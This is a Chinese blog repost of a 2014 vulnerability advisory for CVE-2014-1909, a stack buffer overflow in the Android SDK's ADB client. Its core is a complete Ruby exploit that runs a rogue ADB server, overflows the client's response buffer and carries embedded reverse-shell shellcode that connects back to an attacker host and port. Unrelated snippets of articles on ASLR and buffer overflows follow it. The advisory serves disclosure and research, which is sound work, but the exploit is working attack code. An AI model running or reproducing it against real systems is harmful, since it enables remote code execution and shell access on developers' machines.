android缓冲区溢出执行代码,Android SDK 平台工具签名错误栈缓冲区溢出漏洞

最新推荐文章于 2021-06-07 13:15:41 发布
最新推荐文章于 2021-06-07 13:15:41 发布
阅读量120 收藏
点赞数
文章标签: android缓冲区溢出执行代码

发布日期:2014-02-04

更新日期:2014-02-15

受影响系统:

Android SDK

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 65403

CVE(CAN) ID: CVE-2014-1909

Android SDK Platform Tool是Android设备的开发软件包。

Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/env ruby

# -*- coding: binary -*-

require 'socket'

require 'uri'

puts "[*] Exploit for ADB client stack buffer overflow -jduck"

# linux/x86/shell_reverse_tcp - 90 bytes

# http://www.metasploit.com

# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,

# ReverseConnectRetries=5, ReverseAllowProxy=false,

# PrependFork=true, PrependSetresuid=false,

# PrependSetreuid=false, PrependSetuid=false,

# PrependSetresgid=false, PrependSetregid=false,

# PrependSetgid=false, PrependChrootBreak=false,

# AppendExit=true, InitialAutoRunScript=, AutoRunScript=

payload =

"\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd" +

"\x80\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66" +

"\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8" +

"\x00\x02\x68\x02\x00\x08\x49\x89\xe1\xb0\x66\x50\x51\x53" +

"\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f" +

"\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80\x31" +

"\xdb\x6a\x01\x58\xcd\x80"

def read_request(cli)

len = cli.recv(4)

len = len.to_i(16)

puts "[*] request length: #{len}"

buf = cli.recv(len)

puts "[*] request: #{buf.inspect}"

buf

end

srv = TCPServer.new 5037

loop {

puts "[*] Waiting for client..."

cli = srv.accept

puts "[*] Accepted client"

req = read_request(cli)

if req != "host:version"

puts "[-] incorrect request!"

next

end

res = "OKAY"

res << "-fff"

res << ("A" * 112) # padding

# popped registers

res << [

0xc0c00004, # ebx

0xc0c00008, # esi

0xc0c0000c, # edi

0xc0c00010, # ebp

#0x0810efd3, # eip - int 3 / ret

0x812a14b, # eip - jmp esp

].pack('V*')

res << payload

puts "[*] Sending response (0x%x bytes)" % res.length

cli.write(res)

cli.close

}

srv.close

建议:

--------------------------------------------------------------------------------

厂商补丁:

Android

-------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

晓雪smile
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Android中的防缓冲区溢出技术
weixin_33674976的博客
09-27 185
Android系统提供了非常严格的多层次的安全保护措施,包括代码。为了防止恶意用户采用恶意软件进行缓冲区溢出***或者进行“越狱”操作,自Android 4.0版本之后,内核就引入了ASLR技术来对代码进行保护,本文将详细介绍Android中的防缓冲区溢出技术的来龙去脉。   1、什么是ASLR? ASLR(Address space layout randomization)是...
【专家专栏】Android中的防缓冲区溢出技术
YiRong
10-07 1520
【51CTO专稿】本文将详细介绍Android中的防缓冲区溢出技术的来龙去脉。 1、什么是ASLR? ASLR(Address space layout randomization)是一种针对缓冲区溢出的安全保护技术,通过对堆、、共享库映射等线性区布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。通常情况下,黑客会利用某个特定函数或库驻存
如何处理Android中的防缓冲区溢出技术
weixin_33836223的博客
08-18 182
【51CTO专稿】本文将具体介绍Android中的防缓冲区溢出技术的来龙去脉。 1、什么是ASLR? ASLR(Address space layout randomization)是一种针对缓冲区溢出的安全保护技术,通过对堆、、共享库映射等线性区布局的随机化。通过添加攻击者预測目的地址的难度。防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的。通常情况下。黑客会利用某个特定函数...
android缓冲区溢出执行代码,android – AudioRecord:缓冲区溢出
weixin_39603609的博客
05-26 111
使用我的应用程序进行RECORDING时,我收到缓冲区溢出.录制在服务中执行.我无法弄清楚为什么我从AudioFlinger收到此消息.下面我实例化AudioRecord对象并设置它的回调.bufferSize = AudioRecord.getMinBufferSize(sampleRate, channelConfig, audioFormat);aRecorder = new AudioRe...
android-sdk-NDK18.1.5063045.rar
04-17
4. 安全编码:遵循C/C++的安全编码规范,避免内存泄漏、缓冲区溢出等问题。 总结,Android SDK NDK18.1.5063045是Android原生开发的重要工具,其更新带来了对新平台的支持和编程语言标准的提升,同时也增强了安全性...
android-sdk-NDK20.0.rar
04-17
Android SDK NDK是一个重要的开发工具,它允许开发者在Android平台上使用C和C++编写原生代码,从而提高应用程序的性能和效率。NDK是Native Development Kit的缩写,它是Google为Android开发者提供的一个补充工具,与...
udp.rar_UDP_android_android udp_android开发
09-20
7. **性能优化**:在处理大量数据时,注意避免内存溢出,合理设置缓冲区大小,并及时释放资源。使用BufferedInputStream和BufferedOutputStream可以提高读写效率。 8. **权限管理**:在AndroidManifest.xml文件中...
android-ndk-r9d-windows-x86-64.zip
最新发布
12-08
- **安全问题**:原生代码更容易引发安全漏洞,如缓冲区溢出、类型转换错误等,因此编写安全的C/C++代码至关重要。 - **跨平台兼容性**:由于Android设备的多样性,开发者需要确保代码能在多种架构上正确运行。 - ...
aarch64-linux-android-4.9.zip_NDK AARCH64_aarch64 ndk_android_nd
09-24
原生代码的安全问题不容忽视,需要遵循C/C++编程的最佳实践,避免内存泄漏和缓冲区溢出。同时,由于Android设备的多样性,需确保库在多种CPU架构下都能正常工作,通常需要构建多个ABI版本的.so库。 总结,Android ...
android_sdk_docs_offline-安卓离线SDK
06-12
android_sdk_docs_offline-安卓离线SDK
初步探究缓冲区溢出原理
xiaoyuai1234的博客
08-06 6221
在计算机内部,输入数据通常被存放在一个临时空间内,这个临时存放的空间就被称为缓冲区,缓冲区的长度事先已经被程序或者操作系统定义好了。向缓冲区内填充数据,如果数据的长度很长,超过了缓冲区本身的容量,那么数据就会溢出存储空间,而这些溢出的数据还会覆盖在合法的数据上,这就是缓冲区和缓冲区溢出的道理。
android 内存溢出 add,内存泄露和内存溢出
weixin_28953369的博客
06-07 147
在以前我潜意思里面一直觉得内存溢出和内存泄露是一个意思...今天有人拿这个来问我,我才想起来这两个是有点区别的,真是有点不好意思哈哈。不过他们还真有点关系,一般来说,内存泄露是内存溢出的一个原因之一,当然,内存溢出还有很多原因。内存泄露:是指程序在运行过程中动态申请的内存空间不再使用后没有及时释放,从而很可能导致应用程序内存无限增长。更广义的内存泄露包括未对系统的资源的及时释放,比如不会再用的引用...
Android 内存溢出大总结
Veer的博客
02-01 2235
前言 最近遇到了Android 内存溢出的问题,自己也研究了许久,想必这是大部分Android开发者所遇到的问题,参考了一些大神的博客,自己想把这一块的知识做个大总结,加深一下自己的理解,顺便做一个记录,方便自己以后查看。 Android 内存的意义         其实我们在用安卓手机的时候不用太在意剩余内存,android上的应用是java,当然需要虚拟机,而android上的应
Android 溢出攻击—[0]原理
杏林小轩
12-06 2129
,是一种数据结构,是一个先进后出的数据表,所以会为其抽象出底和顶两个属性。简单的理解,可以用生活中的装书的箱子类比,我们取书的顺序和放书的顺序相反,即第一本放入的书最后才能取出。对的操作也非常简单:压和弹。如图,通常,在谈论溢出时,所指的是操作系统虚拟地址空间中的区stack:系统由系统自动维护(我们可以在编译器编译时指定大小),用于实现函数调用,下面来看下协同是如何协助实现
Android 堆溢出攻击—[0]原理
杏林小轩
01-09 2367
,是一种“先进后出”的数据表,正是由于这个特点,系统使用辅助函数调用及返回,函数中使用的局部变量在中分配,并在函数返回时会被销毁,也就是说对于函外部的程序来说函数内部的局部变量是不可见的,显然这样的变量不能完全满足程序的需求,比如,函数执行后需要把数据的改变传递到程序的其他部分,这样的需求很常见。虽然可以通过全局变量的方式的解决,但全局变量只能在编写程序时预先定义好,并在编译期间为全局变量分
缓冲区溢出详解
weixin_34162401的博客
05-20 1227
  1 缓冲区溢出原理      缓冲区是一块连续的计算机内存区域,可保存相同数据类型的多个实例。缓冲区可以是堆(自动变量)、堆(动态内存)和静态数据区(全局或静态)。在C/C++语言中,通常使用字符数组和malloc/new之类内存分配函数实现缓冲区。溢出指数据被添加到分配给该缓冲区的内存块之外。缓冲区溢出是最常见的程序缺陷。      帧结构的引入为高级语言中实现函数或过程调用提供直...
【软件安全】缓冲区溢出攻击(stack overflow)实践
GentleCP的博客
09-30 1924
文章目录前言攻击准备攻击目标与原理漏洞程序攻击程序攻击步骤关闭现有安全机制以root身份编译漏洞程序确定`shellcode`在内存中位置执行攻击程序 前言 最近在研究stack overflow的复现,发现网上许多教程都偏老了,且许多关键步骤没有说明清楚,导致小白在一步步操作的时候经常出现无法正确获取shellcode的情况,本人也是历经诸多大坑,总算是成功复现了这一过程。下面是溢出成功后的效果图。 个中会涉及到参数在函数中的存储,的返回地址,帧指针,函数如何执行的过程,这部分不再赘述,自行查阅相
缓冲区溢出的原理和实践(Phrack)
02-03
通过这些知识,不仅可以更好地理解溢出的发生机制,还可以编写和分析溢出漏洞的利用代码,从而提升系统安全性。 缓冲区溢出是一种严重的软件安全问题,它利用了编程语言和系统设计中的漏洞,对系统的稳定性和安全性...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值